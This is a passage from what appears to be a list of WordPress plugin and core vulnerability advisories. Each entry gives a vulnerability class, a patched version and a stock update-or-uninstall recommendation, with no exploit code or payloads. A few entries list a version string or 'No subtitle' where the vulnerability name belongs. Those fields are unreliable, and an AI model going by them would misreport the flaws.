Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Adaptive Images for WordPress

Vulnerability: Local File Inclusion
Patched Version: 0.6.67
Recommended Action: Update to version 0.6.67, or a newer patched version

Plugin: WP-MUI – Mass User Input – Add and Export WP Users Quickly

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GD Star Rating

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Frontend File Manager Plugin

Vulnerability: Arbitrary File Upload
Patched Version: 3.8
Recommended Action: Update to version 3.8, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Arbitrary File Upload
Patched Version: 2.7.5
Recommended Action: Update to version 2.7.5, or a newer patched version

Plugin: Simple Social Media Share Buttons – Social Sharing for Everyone

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: Memphis Documents Library

Vulnerability: Arbitrary File Download
Patched Version: 3.1.6
Recommended Action: Update to version 3.1.6, or a newer patched version

Plugin: Booking.com Banner Creator

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Simple History – Track, Log, and Audit WordPress Changes

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Missing Authorization in ‘queue_posts’
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Responsive WordPress Slider

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Wordfence Security – Firewall, Malware Scan, and Login Security

Vulnerability: Stored Cross-Site Scripting
Patched Version: 5.2.3
Recommended Action: Update to version 5.2.3, or a newer patched version

Plugin: UsersWP – Front-end login form, User Registration, User Profile & Members Directory plugin for WP

Vulnerability: Subscriber+ User Avatar Override
Patched Version: 1.2.3.1
Recommended Action: Update to version 1.2.3.1, or a newer patched version

Plugin: WordPress Ad Widget

Vulnerability: Local File Inclusion
Patched Version: 2.12.0
Recommended Action: Update to version 2.12.0, or a newer patched version

Plugin: Jetpack VaultPress

Vulnerability: Remote Code Execution
Patched Version: 1.8.7
Recommended Action: Update to version 1.8.7, or a newer patched version

Plugin: Add Link to Facebook

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Awesome Support – WordPress HelpDesk & Support Plugin

Vulnerability: Authenticated (Submitter+) Arbitrary File Deletion
Patched Version: 6.1.5
Recommended Action: Update to version 6.1.5, or a newer patched version

Plugin: Mmm Simple File List

Vulnerability: Authenticated (Subscriber+) Directory Traversal
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Themesflat Addons For Elementor

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: OAuth 2.0 client for SSO

Vulnerability: Authentication Bypass
Patched Version: 1.11.4
Recommended Action: Update to version 1.11.4, or a newer patched version

Plugin: Starbox Voting

Vulnerability: Full Path Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Guest posting / Frontend Posting wordpress plugin – WP Front User Submit / Front Editor

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 3.8.0
Recommended Action: Update to version 3.8.0, or a newer patched version

Plugin: Redirection

Vulnerability: Missing Authorization in ‘saveRedirectSettings’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: WPtouch – Make your WordPress Website Mobile-Friendly

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.20
Recommended Action: Update to version 1.9.20, or a newer patched version

Plugin: SEUR Oficial

Vulnerability: Cross-Site Scripting
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: Carousel, Slider, Gallery by WP Carousel – Image Carousel with Lightbox & Photo Gallery, Video Slider, Post Carousel & Post Grid, Product Carousel & Product Grid

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.5.3
Recommended Action: Update to version 2.5.3, or a newer patched version

Plugin: Mailster WordPress Newsletter Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.4.9
Recommended Action: Update to version 2.4.9, or a newer patched version

Plugin: Genie WP Favicon

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Portfolio Gallery – Photo Gallery

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Cross-Site Scripting
Patched Version: 14.0.0
Recommended Action: Update to version 14.0.0, or a newer patched version

Plugin: Sign-up Sheets

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.0.14
Recommended Action: Update to version 1.0.14, or a newer patched version

Plugin: All-in-One WP Migration and Backup

Vulnerability: Unauthenticated Backup Download
Patched Version: 7.15
Recommended Action: Update to version 7.15, or a newer patched version

Plugin: NextScripts: Social Networks Auto-Poster

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.2.8
Recommended Action: Update to version 4.2.8, or a newer patched version

Plugin: JetFormBuilder — Dynamic Blocks Form Builder

Vulnerability: Cross-Site Request Forgery via ‘do_admin_action’
Patched Version: 3.0.7
Recommended Action: Update to version 3.0.7, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Authenticated Privilege Escalation via Profile Update
Patched Version: 2.1.12
Recommended Action: Update to version 2.1.12, or a newer patched version

Plugin: Spam protection, Anti-Spam, FireWall by CleanTalk

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.127.4
Recommended Action: Update to version 5.127.4, or a newer patched version

Plugin: Absolute Privacy

Vulnerability: Cross-Site Request Forgery to User Email/Password Change
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: FAQ / Accordion / Docs / KB – Helpie WordPress FAQ Accordion plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.9.9
Recommended Action: Update to version 1.9.9, or a newer patched version

Plugin: Brizy – Page Builder

Vulnerability: Authenticated Stored Cross-Site Scripting via Element Content
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Cyberus Key

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: Event Calendar WD version

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.22
Recommended Action: Update to version 1.1.22, or a newer patched version

Plugin: Maspik – Advanced Spam Protection

Vulnerability: Bypass
Patched Version: 0.10.4
Recommended Action: Update to version 0.10.4, or a newer patched version

Plugin: MailerLite – Signup forms (official)

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: Google Authenticator

Vulnerability: Improper Authentication
Patched Version: 0.48
Recommended Action: Update to version 0.48, or a newer patched version

Plugin: Smart Google Code Inserter

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.5
Recommended Action: Update to version 3.5, or a newer patched version

Plugin: Contact Form 7 – Clockwork SMS

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Business Directory Plugin – Easy Listing Directories for WordPress

Vulnerability: Cross-Site Request Forgery to Arbitrary Listing Export
Patched Version: 5.11.2
Recommended Action: Update to version 5.11.2, or a newer patched version

Plugin: Download Manager

Vulnerability: Authenticated (Contributor+) Arbitrary File Deletion
Patched Version: 3.2.51
Recommended Action: Update to version 3.2.51, or a newer patched version

Plugin: Regpack

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Multi Rating

Vulnerability: Missing Authorization to Arbitrary Ratings Value Change
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Zillow Review Slider

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: Ecwid by Lightspeed Ecommerce Shopping Cart

Vulnerability: Missing Authorization on multiple functions
Patched Version: 6.12.4
Recommended Action: Update to version 6.12.4, or a newer patched version

Plugin: Editorial Calendar

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via edcal_saveoptions AJAX action
Patched Version: 3.8.1
Recommended Action: Update to version 3.8.1, or a newer patched version

Plugin: Email Templates Customizer and Designer for WordPress and WooCommerce

Vulnerability: Cross-Site Request Forgery via send_test_email
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Post Shortcode

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.6.4
Recommended Action: Update to version 3.6.4, or a newer patched version

Plugin: Support Board

Vulnerability: Multiple Unauthenticated SQL Injections
Patched Version: 3.3.4
Recommended Action: Update to version 3.3.4, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Arbitrary WordPress Shortcode Injection
Patched Version: 3.0.32
Recommended Action: Update to version 3.0.32, or a newer patched version

Plugin: Mail logging – WP Mail Catcher

Vulnerability: WP Mail Catcher <= 2.1.3
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: Ultimate WP Query Search Filter

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Echo Sign

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Unauthenticated Local File Inclusion
Patched Version: 4.2.0
Recommended Action: Update to version 4.2.0, or a newer patched version

Core: WordPress

Vulnerability: Spam Embed on Multisite Installations
Patched Version: 3.7.35
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.35, 3.8.35, 3.9.33, 4.0.32, 4.1.32, 4.2.29, 4.3.25, 4.4.24, 4.5.23, 4.6.20, 4.7.19, 4.8.15, 4.9.16, 5.0.11, 5.1.7, 5.2.8, 5.3.5, 5.4.3, 5.5.2

Plugin: Advanced Custom Fields (ACF)

Vulnerability: 6.1.7
Patched Version: 6.1.8
Recommended Action: Update to version 6.1.8, or a newer patched version

Plugin: Car Rental System

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Social Buttons

Vulnerability: Admin+ Cross-Site Scripting
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Core: WordPress

Vulnerability: Authorization Bypass
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: Email Newsletter

Vulnerability: Unauthenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: The Holiday Calendar

Vulnerability: Cross-Site Scripting
Patched Version: 1.11.3
Recommended Action: Update to version 1.11.3, or a newer patched version

Plugin: IMPress Listings

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LightStart – Maintenance Mode, Coming Soon and Landing Page Builder

Vulnerability: Missing Authorization Checks & Cross-Site Request Forgery
Patched Version: 1.8.8
Recommended Action: Update to version 1.8.8, or a newer patched version

Plugin: Spiffy Calendar

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 4.9.6
Recommended Action: Update to version 4.9.6, or a newer patched version

Core: WordPress

Vulnerability: SQL Injection
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Innovs HR – Complete Human Resource Management System for Your Business

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Efí Bank

Vulnerability: Missing Authorization
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Debug Assistant

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 6.0.0
Recommended Action: Update to version 6.0.0, or a newer patched version

Plugin: Push Notifications for WordPress by PushAssist

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Product Table for WooCommerce by CodeAstrology (wooproducttable.com)

Vulnerability: Missing Authorization
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: GDPR Cookie Consent Notice Box

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: Password Reset with Code for WordPress REST API

Vulnerability: Weak Password Recovery Mechanism
Patched Version: 0.0.16
Recommended Action: Update to version 0.0.16, or a newer patched version

Plugin: Print My Blog – Print, PDF, & eBook Converter WordPress Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Popup by Supsystic

Vulnerability: Missing Authorization to Sensitive Information Exposure
Patched Version: 1.10.20
Recommended Action: Update to version 1.10.20, or a newer patched version

Plugin: Import XML and RSS Feeds

Vulnerability: Authenticated (Admin+) Arbitrary File Upload
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: CSV Injection
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: Simple Sitemap – Create a Responsive HTML Sitemap

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.5.8
Recommended Action: Update to version 3.5.8, or a newer patched version

Plugin: Border Loading Bar

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CopySafe Web Protection

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Username Enumeration
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Asset CleanUp: Page Speed Booster

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.8.5
Recommended Action: Update to version 1.3.8.5, or a newer patched version

Plugin: FormCraft – Form Builder

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Parsi Date

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.0.2
Recommended Action: Update to version 4.0.2, or a newer patched version

Plugin: Light Messages

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Cross-Site Scripting via Name and Version Header of Plugin
Patched Version: 3.7.17
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.17, 3.8.17, 3.9.15, 4.0.14, 4.1.14, 4.2.11, 4.3.7, 4.4.6, 4.5.5, 4.6.2, 4.7.1

Plugin: EZPZ One Click Backup

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Booster Elite for WooCommerce

Vulnerability: Missing Authorization to Order Information Disclosure
Patched Version: 7.1.2
Recommended Action: Update to version 7.1.2, or a newer patched version

Plugin: DPD Baltic Shipping

Vulnerability: Missing Authorization to Arbitrary Options Deletion
Patched Version: 1.2.57
Recommended Action: Update to version 1.2.57, or a newer patched version

Plugin: Post Grid, Slider & Carousel Ultimate – with Shortcode, Gutenberg Block & Elementor Widget

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: MoolaMojo

Vulnerability: No subtitle
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Thumbnail carousel slider

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.10
Recommended Action: Update to version 1.1.10, or a newer patched version

Plugin: Advanced Woo Search

Vulnerability: Cross-Site Scripting
Patched Version: 1.70
Recommended Action: Update to version 1.70, or a newer patched version

Plugin: Profile Builder Pro

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.10.1
Recommended Action: Update to version 3.10.1, or a newer patched version

Plugin: WP User Control

Vulnerability: Insecure Password Reset Mechanism
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Gallery Bank – WordPress Photo Gallery Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.20
Recommended Action: Update to version 2.0.20, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: Reflected Cross-Site Scripting via extension
Patched Version: 2.1.5
Recommended Action: Update to version 2.1.5, or a newer patched version

Plugin: WP Dummy Content Generator

Vulnerability: Missing Authorization
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Arigato Autoresponder and Newsletter

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.1.7.2
Recommended Action: Update to version 2.1.7.2, or a newer patched version

Plugin: Upload File Type Settings Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Pinpoint Booking System – #1 WordPress Booking Plugin

Vulnerability: Cross-Site Request Forgery via initBackEndAJAX
Patched Version: 2.9.9.4.1
Recommended Action: Update to version 2.9.9.4.1, or a newer patched version

Plugin: XO Event Calendar

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.7
Recommended Action: Update to version 2.3.7, or a newer patched version

Plugin: Kaya QR Code Generator

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via qrCode attribute
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Fraud Prevention For WooCommerce and EDD

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.6
Recommended Action: Update to version 2.1.6, or a newer patched version

Plugin: MailChimp Forms by MailMunch

Vulnerability: Cross-Site Request Forgery via Multiple AJAX actions
Patched Version: 3.1.8
Recommended Action: Update to version 3.1.8, or a newer patched version

Core: WordPress

Vulnerability: 2.0.5
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Top 10 – WordPress Popular posts by WebberZone

Vulnerability: <= 3.2.4
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Plugin: WP Activity Log

Vulnerability: Missing Capabilities Check to User Enumeration
Patched Version: 4.5.2
Recommended Action: Update to version 4.5.2, or a newer patched version

Plugin: Slider, Gallery, and Carousel by MetaSlider – Image Slider, Video Slider

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.17.2
Recommended Action: Update to version 3.17.2, or a newer patched version

Plugin: Download Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.9.46
Recommended Action: Update to version 2.9.46, or a newer patched version

Plugin: Knews Multilingual Newsletters

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: Sabai Discuss

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.14
Recommended Action: Update to version 1.4.14, or a newer patched version

Plugin: WordPress Portfolio Plugin – A Plugin for Making Filterable Portfolio Grid, Portfolio Slider and more

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: Google Authenticator – WordPress 2FA, OTP SMS and Email

Vulnerability: Unauthenticated Arbitrary Options Deletion
Patched Version: 5.5
Recommended Action: Update to version 5.5, or a newer patched version

Plugin: Premmerce User Roles

Vulnerability: Missing Authorization via role management functions
Patched Version: 1.0.13
Recommended Action: Update to version 1.0.13, or a newer patched version

Plugin: Orbit Fox by ThemeIsle

Vulnerability: Improper REST Capabilities Checks
Patched Version: 2.6.4
Recommended Action: Update to version 2.6.4, or a newer patched version

Plugin: FOX – Currency Switcher Professional for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.7.3
Recommended Action: Update to version 1.3.7.3, or a newer patched version

Plugin: Mail Masta

Vulnerability: SQL Injection via list_id parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Quick FrontEnd Editor – WordPress Plugin

Vulnerability: Authenticated (Subscriber+) Content Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Real Cookie Banner: GDPR & ePrivacy Cookie Consent

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.18.2
Recommended Action: Update to version 2.18.2, or a newer patched version

Plugin: Post SMTP – WordPress SMTP Plugin with Email Logs and Mobile App for Failure Notifications – Gmail SMTP, Office 365, Brevo, Mailgun, Amazon SES and more

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.3.7
Recommended Action: Update to version 7.3.7, or a newer patched version

Plugin: Complianz – GDPR/CCPA Cookie Consent

Vulnerability: GDPR/CCPA Cookie Consent <= 6.4.4
Patched Version: 6.4.5
Recommended Action: Update to version 6.4.5, or a newer patched version

Plugin: MainWP Code Snippets Extension

Vulnerability: Missing Authorization to Plugin Settings Change
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: Ziteboard Online Whiteboard

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via ziteboard Shortcode
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Membership by Supsystic

Vulnerability: Authenticated (Admin+) Time-Based Blind SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Activity Log WinterLock

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.21
Recommended Action: Update to version 1.0.21, or a newer patched version

Plugin: Feed Statistics

Vulnerability: Cross-Site Request Forgery via init
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: SQL Injection
Patched Version: 2.0.11
Recommended Action: Update to one of the following versions, or a newer patched version: 2.0.11, 2.2.2

Plugin: Currency Switcher for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Simple Staff List

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: Advanced Dynamic Pricing for WooCommerce

Vulnerability: Missing Authorization in ajaxCalculateSeveralProducts function
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.9.5
Recommended Action: Update to version 2.9.5, or a newer patched version

Plugin: Razorpay for WooCommerce

Vulnerability: Missing Authorization
Patched Version: 4.5.7
Recommended Action: Update to version 4.5.7, or a newer patched version

Plugin: Image Hover Effects Ultimate (Image Gallery, Effects, Lightbox, Comparison or Magnifier)

Vulnerability: Authenticated Stored Cross-Site Scripting via Media URL
Patched Version: 9.8.0
Recommended Action: Update to version 9.8.0, or a newer patched version

Plugin: Easy Social Share Buttons for WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.5
Recommended Action: Update to version 3.5, or a newer patched version

Plugin: Google Maps in Posts

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Secondary Title

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Layer Slider

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Download Monitor

Vulnerability: Missing Authorization
Patched Version: 3.2.9
Recommended Action: Update to version 3.2.9, or a newer patched version

Plugin: WP Dynamic Keywords Injector

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.16
Recommended Action: Update to version 2.3.16, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.6.9
Recommended Action: Update to version 2.6.9, or a newer patched version

Plugin: Social Discussions

Vulnerability: Remote File Inclusion and Full Path Disclosure
Patched Version: 6.1.2
Recommended Action: Update to version 6.1.2, or a newer patched version

Plugin: User Notes

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: nex-forms

Vulnerability: Authentication Bypass for PDF Reports
Patched Version: 7.8.8
Recommended Action: Update to version 7.8.8, or a newer patched version

Plugin: Email Templates Customizer and Designer for WordPress and WooCommerce

Vulnerability: HTML Injection
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: CSprite

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ajax Search Lite – Live Search & Filter

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.11.1
Recommended Action: Update to version 4.11.1, or a newer patched version

Plugin: Login with Cognito

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.4.9
